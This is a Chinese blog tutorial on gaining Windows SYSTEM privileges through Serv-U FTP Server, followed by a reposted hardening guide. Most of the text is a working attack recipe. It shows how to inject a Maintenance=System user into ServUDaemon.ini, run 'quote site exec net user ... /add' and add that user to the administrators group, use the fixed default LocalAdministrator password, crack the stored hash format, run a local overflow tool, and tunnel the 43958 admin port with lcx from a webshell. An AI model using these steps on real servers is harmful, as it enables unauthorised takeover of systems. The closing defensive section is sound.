当你的才华

还撑不起你的野心时

那你就应该静下心来学习

第三方软件提权

Server-u 提权

Serv-U FTP Server，是一种被广泛运用的FTP服务器端软件，支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等。

对于可写权限的，可以通过手工修改ServUDaemon.ini文件来修改用户密码了。但是注意这样修改后的密码，需要重起Serv-U才能生效。要使得密码即时生效，还需要在ServUDaemon.ini的[[GLOBAL]]部分加入ReloadSettings=True，这个语句在Serv-U重新载入ServUDaemon.ini的内容后会自动消失。

由于Serv-U的用户多，提权成功率也高，众多ASP木马纷纷将此提权功能集成在内（大部分木马都是针对不可写权限情况设计的）。

对于不可写权限，serv_u6.4以下的，如果默认密码没有修改的，直接可以提权。7以上的可以修改下脚本提权目录，不要用默认的C盘，改在其他盘符用脚本提权

如果管理员能够执行，就用管理员帐号来提权

如果不行，就利用管理员身份创建可以执行的用户

server-u提权常用方法一

1，查看默认安装目录下的ServUDaemon.ini文件，进而查看用户名和密码，将密码去cmd5.com找到对应的server-u的解密方式进行解密。

2，登入ftp，执行如下命令，创建用户，并且加入到管理员组。

quote site exec net user v01cano v01cano /add
quote site exec net localgroup administrators v01cano /add

server-u提权常用方法二

1，使用大马直接创建ftp账号，使用ftp账号登入ftp。

2，然后再执行如下命令，创建系统账号。

quote site exec net user v01cano v01cano /add
quote site exec net localgroup administrators v01cano /add

server-u提权常用方法三

server-u的管理员账号权限较大，相当于系统权限，可以通过管理员账号直接创建用户，并且加入到管理员组。

0x01 Serv-U提权分两种

• 有修改权限（可写权限）

• 无权限修改（不可写权限）

拓展知识：

• 本地溢出权限提升（该漏洞存在于serv-u 6.0和6.0以前的版本）

• serv-u ftp转发端口

前言

预备知识：

serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
serv-u密码文件：ServUDaemon.ini
端口如果改了可以通过pid查看
或者可以到serv u的配置文件里面去找！
SerUDaemon.ini这个文件
lccalsetuportNo=端口

管理员修改了serv u 密码
进入其安装目录找到serv u的ServUDaemon.ini这个文件（该文件时储存密码的）,然后将密码丢到shell里面去，然后进行serv-u提权，不过一般管理员并不修改serv-u的密码

0x02 有修改权限

0. 判断是否安装serv-u

serv-u的默认端口是43958 可以用nmap 扫描确认

1. 检查是否有可写权限

一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini

打开配置文件

2. 增加用户

在user4=添加一个系统用户

或这样也可以

[USER=spiger|1] //用户名
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5 //用户密码加密后的密文
HomeDir=c:\ftp\seven //目录
RelPaths=3
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
SKEYValues=
注解：斜杠为理解之用，并非也要予以添加
添加上述代码并保存后，就会在serv-u中添加用户名为spiger，密码是123456。
通过在本地命令行执行ftp 目标IP地址命令来连接目标FTP服务器。
连接后quote site exec net user spiger 123456 /add
quote site exec net localgroup administrators spiger /add

注：Access1=C:\|RWAMELCDP（这个代表所有权限，包括可执行）

复制一个修改名字

password 密码格式是 gw+md5

我从https://www.cmd5.com/ 把gw123456 加密注意gw是他的，也属于密码规则

把加密完的密码去替换复制的密码 password=gw+md5(gw123456)

如果默认用户名和密码被修改，那么我们可以查看下serv_u的安装目录（如何找到安装目录不在本文讨论范围），Serv-U默认的是把密码保存在ServUDaemon.ini文件中。

默认的密码加密规则是：

1. 随机生成两个字母；
2. 把这两个字母和用户的密码拼接；
3. 用md5加密这个拼接得到的字符串，并把加密结果全部转为大写；
4. 把第1步中的那两个字母和第3步的结果拼接，得到的字符串就是用户密码的最终密文。

那么知道这个原理，我们可以把找到的密码分开去破解，然后用破解的用户名和密码再去用脚本提权

maintenance=system 是代表系统权限 user=你命名的用户

cmd访问 ftp 连接 ip 输入你刚刚添加的用户密码，登录成功如下图：

输入

quote site exec net user username password /add
quote site exec net localgroup administrators username /add

利用ftp命令quote site exec 添加用户加入administrators 权限组

打开3389连接

PS：上述添加的文件中最重要的是Maintenance=System这句，有了这句添加的FTP用户才是管理员用户，才会有命令执行权限（因为最后是通过FTFP执行命令来添加系统用户的）

网上看到的另外一种有权限方式

Serv-U目录有修改提权：

ServU 密码加密存储方法

首先随机生成2位字符(从a-z小写字符)

再将用户原始密码与这2位随机字符合并成为新的密码字符.

如: 用户原始密码为a,随机生成字符为dx,则合并后新的密码字符串为:"dxa"

再使用新密码字符串进行MD5 Hash运算.

dxa=F2319AE3B312103BB3259CA8242DD16C

然后再存储到ini文件,存储方法为2位随机字符加上新密码字符的MD5 Hash值.

如下:

[USER=a|1]
Password=dxF2319AE3B312103BB3259CA8242DD16C

ServU 密码破解方法:

除去前2位随机字符获得F2319AE3B312103BB3259CA8242DD16C.

把该MD5 Hash值存入暴力破解工具,产生字典时注意前2位密码必定是dx.

F2319AE3B312103BB3259CA8242DD16C=dxa

提权思路：Serv-U 修改serv-u配置文件添加超级管理员

步骤：

[USER=lx|1]
Password=uc8270A0A37BE006573C96DB29DF42DEE8
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP

用cmd登陆ftp，，然后在执行下列命令添加用户

quote site exec net user 用户密码 /add 添加用户
quote site exec net localgroup administrators 用户 /add 添加到管理员组

C:\Program Files\RhinoSoft.com\Serv-U 默认端口43958 修改的文件ServUDaemon.ini (默认路径)

注意：添加失败的原因可能添加的用户名重名，试试其他组合的用户名，User2=pp|1|0 （用户的顺序一定要设置好）

0x03 无修改权限

1. 利用md5 直接去解密（ini 文件密码在ftp连）

2. 默认密码，默认用户

端口写上ftp的端口

口令可能不是默认值，(通过c32hex它)

hex 就是十六进的意思

账户：LocalAdministrator ，密码：#l@$ak#.lk;0@P

命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add

3. 不是默认密码时直接把SerUAdmin.exe 下载下来进行查看密码

0x04 对权限文件，进行一个总结吧

serv-u配置文件无修改权限，但是可以看到配置文件，进行口令破解

看到FTP用户的配置文件ServUDaemon.ini，在其中找到Maintenance=System的用户，该用户就是系统管理员。如果能够成功破解系统管理员的口令，就可以利用该管理员执行添加系统管理员的用户

serv-u配置文件中Password字段就是用户口令加密变换后的字符串，破解方法：去掉前两位，剩下的进行md5破解，破解后再去掉前两位，剩下的就是FTP用户口令。

serv-u配置文件无修改权限，可以用Serv-u管理用户来进行提权（这是最常用的方法，一般大马中集成的serv-u提权方法就是本方法）

serv-u的默认管理端口是43958，只有本地才能进行连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是”#l@$ak#.lk;0@P“，这个密码是固定的。如果网站管理员忘记修改密码，那么获取webshell后就可以连接该端口后执行命令来添加系统用户。

虽然，网站管理员很少修改serv-u的这个默认管理账号和口令，但是如果管理员修改了，我们还可以通过查 ServUAdmin.exe文件来获取管理账号和口令。

方法如下：

1. 下载serv-u目录下的ServUAdmin.exe文件
2. 在本地用文本文件打开，查找LocalAdministrator字符来获取口令位置
3. 通常可以看到serv-u的管理账号和口令都在文件中，仔细查找即可（如果连用户名也修改了，就搜127.0.0.1或记住账号和密码在文件中的位置）。获取管理账号和口令后就可以利用大马自带的serv-u来进行提权了。

0x05 serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下比如是d盘
3、执行命令 d:\serv_u.exe
4、d:\serv_u.exe “net user username password /add” (注意命令要有引号)
5、d:\serv_u.exe “net localgroup administrators username /add” (注意命令要有引号)

0x06 serv-u ftp转发端口

上一种方法中提到serv-u的本地管理账号只能本地进行连接，但我们可以利用端口转发的方式来将其管理端口转发的本地，进而提权。在目标Webshell上运行LCX：lcx -slave 你的IP 5000 127.0.0.1 43958
在本机上运行：lcx -listen 5000 21

打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P

此时的连接过程是：本机连接21端口——>转发往本机5000端口——>管道连接至远程机5000端口——>转发至远程43958端口

连接成功后，在本机登陆Serv_U就相当于登陆了远程的Serv_U。你可以FTP登陆本机IP,输入上面的帐号和密码，在远程FTP服务器上执行命令。

上面是serv-u6及以下的主要方法，其中方法也适用于servu-7等版本，只是文件路径可能有所变化。下面讲serv-u7及以上版本的提权，不适用于serv-u6是因为文件路径发生变化，serv-u6没有相应文件。

serv-u7中管理员的口令在C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive文件中，破解方法和serv-u6是一样的。

那么该如何防御呢？

servr-u如果权限设置不当容易被提权，添加账号

防范方法:

1.确保serv-u安装路径只有系统用户访问权限
2.确保建立的ftp账号不要给执行权限
3.修改ftp默认监听端口

Serv-U防溢出提权攻击解决办法：

降底Serv-U的运行权限与控制Serv-U的“Acls”可访问目录

分析一下Ser-U 防溢出提权产生的原因

如今Microsoft系列(Win2k Win2k3)SERVER中使用最为广泛的FTP服务器之一、大名鼎鼎的Serv-U FTP服务器中如何简单地解决Overflow溢出、以及Hacker常用的Webhsell提升权限等类攻击的隐患与缺陷；读完本文，您将可以使您的 Serv-U服务器免去被溢出、被提升权限的安全威胁与危险。

前言：
大家应该都还没有忘记三年前在Serv-U5.004版的之前所有版本的"Serv-U FTPMDTM命令缓冲区溢出"与"Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞"吧，这个漏洞让很多服务器管理员立坐不安，也让很多大型的站点、甚至电信级的服务器沦陷了...随着Serv-U新版本的推出，这个漏同已经不存在了；虽然溢出不存在了，但黑客永远也没有停止，所以伴随着来的又是Serv-U5.0到6.0之黑客常用的本地提升权限缺陷。(注：最常见的就如webshell+su提权，我在 Baidu输入"Serv-U提权"关键词，搜索结果“百度一下，找到相关网页约34,000篇，用时0.001秒 ”）因此，解决Serv-U的安全问题迫在眉睫。
Serv-U提权虽然严格来说这个不应该算是Serv-U的重大漏洞，但只要因管理员的配置不当将会产生严重的后果;下面LeeBolin就来为大家介绍下如何安全配置 Serv-U，才能保证Serv-U甚至服务器的安全

一、大家知道Liunx系统和Unix系统比Windows安全的一个重要原因在于：

Linux和Unix的系统服务不使用root权限，而是使用权限比较低的另外一个单独用户，比如web服务使用了nobody这个用户。而Serv-U默认是以system身份运行的，而System这个系统内置账户对本机有完全操作的权限;因此如果攻击者利用Serv-U程序的漏洞而获得了可执行shell的那，那么他将可以随意控制操作系统里任何一个目录了

二、我们根据一的讲解知道了为什么Serv-U提权与溢出攻击可怕的原因了，那么我们该如何防止这一类攻击的发生呢？

答案：就是降底Serv-U的运行权限与控制Serv-U的“Acls”可访问目录。

三、Serv-U安全配置
1、首先请保持合用Serv-U的最新版本(目前新版为6.4...)。然后在安装Serv-U的时候尽量不要选择默认的安装目录，比如俺将Serv-U 安装在D:/Pro_LeeBolin^_^/Serv-U#$2008$/...(因为这样复杂的目录名可防止Hacker的猜解)
2、然后将Serv-U取消MDTM命令的执行，修改Serv-U FTP Banner并开启好Serv-U的FTP日志保存到非系统盘，日志选择记录好Serv-U命名用了那些命令与DLL，并为Serv-U设置一个强壮的本地管理密码(因提权多是因为Serv-U的默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P所造成的，呵呵 $_$)，你还可以选择将Serv-U的FTP账户信息保存到注册表，不要存在Serv-U目录下的ini文中，这样更加安全。
3、我们再开启"计算机管理"新建一个用户Serv-UAdmin,设置好密码。将用户退出Users组，不加入任何组。并在用户的“终端服务配置文件”选项里取消“允许登录到终端服务器。并且禁止Serv-UAdmin用户的本地登陆。进入控制面板 -> 管理工具 -> 本地安全策略 -> 本地策略 -> 用户权利指派 -> 拒绝本地登陆。(备注：这个用户我们将它来作为俺们Serv-U的服务运行账号，嘿嘿)[(AD^_^:游刃在技术鬼神边缘,打造服务器安全神话！创世纪网络技术前瞻，成就互联网革命先驱！服务器安全讨论区[S.S.D.A]) ]
4、开始运行"Services.msc"打开win的服务管理器，找开Serv-U Ftp Server的Serv-U服务;打开“登陆”对话框。当前默认的为“本地系统帐户”。我们将其修改为我们在3中新建的Serv-UAdmin用户，并输入密码。
5、下面的工作就是设置Serv-U的运行与FTP目录的ACLs权限了:
①C:/Documents and Settings/Serv-UAdmin 目录加入Serv-UAdmin的权限，允许读取与写入..
②D: /Pro_LeeBolin^_^/Serv-U#$2008$/　Serv-U的安装目录加入Serv-UAdmin的权限，允许读取与运行。(如果选择了账户保存在ini文件的话，这里就需要增加修改与删除权限，因增删FTP账户时需要删改权才成，否则不能增删FTP账户哟^_^)
③ 如果Serv-U账户选择存在注册表的话。运行regedt32.exe,打开注册表编辑器。找到[HKEY_LOCAL_MACHINE/ SOFTWARE/Cat Soft]分支。在上面点右键，选择权限，然后点高级，取消允许父项的继承权限传播到该对象和所有子对象，删除除admins外的所有的账号。仅添加 Serv-UAdmin账号到该子键的权限列表，并给予完全控制权限。（如果选择了账户信息保存在ini文件中的话可略过此步。）
④ 现在就来设置WEB目录的ACLs了，比如我的虚拟主机总目录为E:/Leebolin$(%;那么我们将此WEB目录加入 Serv-UAdmin账号的权限即可，这样FTP就可以访问我们的WEB目录进行上传下载了，呵.(由于Serv-U并没有以system运行，所以这里只存留admins与serv-uadmin的权限就OK了。)
⑥如果是asp/php/html脚本的话，WEB目录只需要 admins & serv-uadmin & IUSR_XX即可(这里的IUSR_XX是指站点的匿名单用户账号...关于站点的安全与asp.Net的安全请参考我以前的文章:《FSO安全隐患解决办法》、《ASP木马Webshell之安全防范解决办法》、《ASP.NET木马及Webshell安全解决方案》、《服务器安全检查十大要素》)

四、到目前为止，我们的Serv-U已经简单的做到了防提权，防溢出了。为什么呢？

因为能常远程溢出 overflow的话，都是通过得一shell 而进行进一步的hacking，而我们现在的Serv-U不是以system运行，所以即使执行了overflow指命，也并不能得到什么...防提权就不用我解释了：因为我们的Serv-Uadmin没有任何系统级的ACLs访问权限..

后记：其实服务器、系统的安全是个整体的概念；有可能你其它一小点的疏忽就可以让你的网站、甚至服务器沦陷。因此安全策略必需走防患未然的道路，任何一个小地方都不能马虎、今天关于防Serv-U的安全配置小技巧就为大家介绍到这里...

参考链接：

https://www.landui.com/help/show-1354.html

https://www.landui.com/help/show-6145.html

https://blog.csdn.net/Is0Man/article/details/51179637

https://www.cnblogs.com/feizianquan/p/10891352.html

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

提权学习：第三方软件提权（Server-u 提权）43958相关推荐

提权学习：第三方软件提权（Radmin 提权） 4899
当你的才华还撑不起你的野心时那你就应该静下心来学习目录 Radmin 提权 0x01 介绍 0x02 利用方式常见虚拟主机常见路径第一种方式:手工查询注册表爆hash值第二种方式:通过大马 ...
提权学习：第三方软件提权（FileZilla 提权）14147
当你的才华还撑不起你的野心时那你就应该静下心来学习目录 FileZilla 提权 0x01 介绍 0x02 提权思路 0x03 操作演示 0x04 拓展知识提权的思路就以下几种: 这篇文章直接 ...
提权学习：第三方软件提权（G6FTP 提权） 8021
当你的才华还撑不起你的野心时那你就应该静下心来学习目录 G6FTP 提权 0x01 介绍 0x02 G6FTP 提权思维导图 0x03 操作步骤演示文章传送门: ...
Day1——提权学习之提权基础
0x00 提权技术分类大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...
mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究
MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...
Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell，ImageMagrick命令执行漏洞横向提权，更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
数据结构与算法学习笔记15：最大流问题 / 二分图 / 有权无权二分图的匹配 / 匈牙利算法 / 银行家算法 / 稳定婚配
数据结构与算法学习笔记15:最大流问题 / 二分图 / 有权无权二分图的匹配 / 匈牙利算法 / 银行家算法 / 稳定婚配引入小题:最短路径最大流问题(maximum flow problem) ...
[学习笔记]最小割之最小点权覆盖最大点权独立集
最小点权覆盖给出一个二分图,每个点有一个非负点权要求选出一些点构成一个覆盖,问点权最小是多少建模: S到左部点,容量为点权右部点到T,容量为点权左部点到右部点的边,容量inf 求最小割即可. ...
spring-cloud-netflix学习笔记(一):Eureka Server
spring-cloud-netflix学习笔记一:Eureka Server 添加依赖启动类自我注册单机版集群版鉴权 Eureka用于服务的注册与发现,跟zookeeper类似. 添加依赖 ...

提权学习：第三方软件提权（Server-u 提权）43958